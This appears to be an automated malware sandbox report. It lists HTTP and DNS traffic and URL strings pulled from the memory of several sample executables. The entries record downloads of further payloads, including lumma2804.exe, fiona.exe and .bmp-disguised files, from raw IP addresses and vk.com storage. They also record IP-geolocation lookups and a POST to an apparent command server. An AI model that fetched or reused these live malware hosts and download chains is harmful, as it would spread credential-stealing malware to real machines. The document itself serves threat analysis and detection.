Source: global traffic	HTTP traffic detected: GET /doc5294803_669132669?hash=ZKjz6ih7UQ9lzkD21VhcvrQwcwdE4E0ZYGiugVcv47k&dl=WempMPmw6ufkYnUzfTIoLDfW8XiZgAu8J2F0VsJ9NwT&api=1&no_preview=1#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_669123201?hash=XDCpjElzxewo4KzTOHuQEMVCKwzlHqQzBJyb5YKd2Jc&dl=cOyLY32AZWRaWIUaV6LVF1KVnbsjSHxC1w6esY9lvXc&api=1&no_preview=1#mene HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c237031/u5294803/docs/d48/faa96ddc856f/BotClient_make.bmp?extra=-QkfenqPxrvYtmrTIqBQ0mVeqEu8ubnNU1NG8tGGtw3-QFsDYjvYp64yJnpB_OcMg0uhKlG1RASme310Qax8_egiLSt12hVPF9Wl3DN6qYLOxmECHbAL6mz2NgJ9qEZNdnWZ6unUcjI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc5294803_669074803?hash=gtxjyDdukAIKxlWY09AIJPG5gj5TRTjhoVyhzgbP72o&dl=A9s6LaMpuQCyacGXT0hxzf0MvaBJbV8eIlyefAe3TSw&api=1&no_preview=1#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c909218/u5294803/docs/d8/57e1b3af3092/crypted.bmp?extra=Gxkm1-qUj4gTylzhygF0ymDxXHL811_5cKi0pGRSmNbB8xbMKVlvz1Dj_tciMVuEusahBVGi1kGq7gOCAviXVpJzhtwg5lCSO-f5sXIwePQ4Q0UjpInqDSzvgoI_tCv82d6g6aUD97c HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-22.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /c236331/u5294803/docs/d47/5d64691d2964/crypted.bmp?extra=kGc4Kw6r3KNmnJcNsZNoeqzxsyU48VGtKMsa8v9e4LEHURc7u4wFMmsoHQSLycKdnKbLmB8U76u1qw4WomWhiyKAlTZiZ2p3djsH9911hBclkSW3TQfktfGI1iuTmpkRbaERsG2JfXY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGiurKsySjR8YhvL7Ks3RZIJ4qJjfFMeqQgdrQ8&api=1&no_preview=1#ww12 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c237231/u5294803/docs/d14/fab319a9eaa9/file.bmp?extra=XekPvLwajf3zjaY5buJAe3HnfkyeicpSttiDxaJzdLoB5YHmFFoUME6QuSgS26MeSPNwYYaTqVwUYy3Yw-9Wvle-70JE1-Pdb5-fcQuxBseFU0qmjloWPkyYmuqT-KQGgal4YgoTpuk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-21.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1aFYp7.mp3 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic	HTTP traffic detected: GET /1pRXr7.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /1BV4j7.mp4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /profiles/76561199680449169 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /api/bing_release.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10
Source: global traffic	HTTP traffic detected: GET /dl.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /padla/fiona.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 193.233.132.139Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/th/retail.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: sextipolar.sbsCache-Control: no-cacheCookie: _subid=2aviuam2b4oin; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE
Source: global traffic	HTTP traffic detected: GET /download/th/getimage12.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /upd/index.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: pofix.redCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/th/space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: api.myip.com
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: vk.com
Source: global traffic	DNS traffic detected: DNS query: monoblocked.com
Source: global traffic	DNS traffic detected: DNS query: dod.fastbutters.com
Source: global traffic	DNS traffic detected: DNS query: zanzibarpivo.com
Source: global traffic	DNS traffic detected: DNS query: pofix.red
Source: global traffic	DNS traffic detected: DNS query: sextipolar.sbs
Source: global traffic	DNS traffic detected: DNS query: triedchicken.net
Source: global traffic	DNS traffic detected: DNS query: cheremushki.net
Source: global traffic	DNS traffic detected: DNS query: carthewasher.net
Source: global traffic	DNS traffic detected: DNS query: f.123654987.xyz
Source: global traffic	DNS traffic detected: DNS query: sun6-20.userapi.com
Source: global traffic	DNS traffic detected: DNS query: sun6-22.userapi.com
Source: global traffic	DNS traffic detected: DNS query: sun6-21.userapi.com
Source: global traffic	DNS traffic detected: DNS query: iplis.ru
Source: global traffic	DNS traffic detected: DNS query: iplogger.org
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: db-ip.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: cskuxgp.net

Source: unknown

HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 113Host: 5.42.66.10

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 May 2024 06:40:21 GMTContent-Type: text/html; charset=utf-8Connection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 01 May 2024 06:40:21 GMTSet-Cookie: _subid=2aviuam2b4oin; expires=Sat, 01 Jun 2024 06:40:21 GMT; path=/Set-Cookie: 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE; expires=Wed, 31 Aug 2078 13:20:42 GMT; path=/Vary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 87cdc7926b9c2415-IAD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 May 2024 06:40:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 01 May 2024 06:40:22 GMTSet-Cookie: _subid=2aviuam2b4oj5; expires=Sat, 01 Jun 2024 06:40:22 GMT; path=/Set-Cookie: 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE; expires=Wed, 31 Aug 2078 13:20:44 GMT; path=/Vary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 87cdc79a9dec8791-IAD

Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.203/dl.php
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.139/
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.139/padla/fiona.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.139/padla/fiona.exeG
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2552343455.0000000005E97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exe
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exe5_
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exe;q
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exete
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exeteata2
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.253/lumma2804.exezQo
Source: softjenimmp3converter.exe, 00000031.00000002.3134144272.0000000003290000.00000004.00000020.00020000.00000000.sdmp, softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000008A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.88.90.160/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec938f45
Source: softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000008C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.88.90.160/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14
Source: WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/123p.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/getimage12.php
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/getimage12.php.
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.php
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phpE
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phpZ
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phpi
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phpz
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/space.php
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: is-280SC.tmp.25.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: is-280SC.tmp.25.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
